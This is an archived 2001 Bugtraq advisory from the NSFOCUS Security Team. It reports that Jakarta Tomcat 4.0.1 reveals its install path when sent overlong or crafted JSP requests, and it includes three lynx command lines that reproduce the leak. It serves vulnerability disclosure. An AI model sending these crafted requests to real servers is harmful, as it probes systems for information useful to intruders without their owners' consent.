Hi

From: analysist (analysist@nsfocus.com)
Date: 11/22/01

• Previous message: Seth Arnold: "Re: SuSE 7.3 : Kernel 2.4.10-4GB Bug"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Message-Id: <200111220923.fAM9Mxu28837@www.nsfocus.com>
Date: Thu, 22 Nov 2001 17:32:20 +0800
From: analysist <analysist@nsfocus.com>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Subject:  Hi

Hello,

It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submiting an unusually long request(more than 222 bites) or a special crafted request, we can
get the web server's install path.

How to produce it
----------------------
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp

Tested version
-----------------------
Jakarta Tomcat v4.0.1
    Microsoft Windows 2000

I sent this information to the vendor a week ago, but i have not received any reply!:(

Best Regards

analysist@nsfocus.com
NSFOCUS Security Team <http://www.nsfocus.com>

---

• Previous message: Seth Arnold: "Re: SuSE 7.3 : Kernel 2.4.10-4GB Bug"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2001-11